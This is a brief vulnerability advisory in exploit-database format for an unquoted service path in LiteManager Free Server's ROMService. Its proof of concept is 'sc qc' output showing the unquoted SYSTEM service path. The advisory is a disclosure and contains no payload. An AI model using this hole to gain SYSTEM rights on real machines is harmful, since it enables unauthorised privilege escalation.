Exploit Title: LiteManager Free - Unquoted Service Path Privilege Escalation
Exploit Author : Nir Yehoshua
Exploit Date: 2019-12-26
Link Software : http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support
Category: local
Vulnerability type: Local Privilege Escalation

LiteManager Free Server installs a service ("ROMService")  with an unquoted service path running with SYSTEM
privileges.
This allows any non-privileged local user to execute arbitrary code with SYSTEM privileges.

PoC:

C:\Users\nir>sc qc ROMService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ROMService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\LiteManagerFree - Server\ROMServer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : LiteManagerTeam LiteManager
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem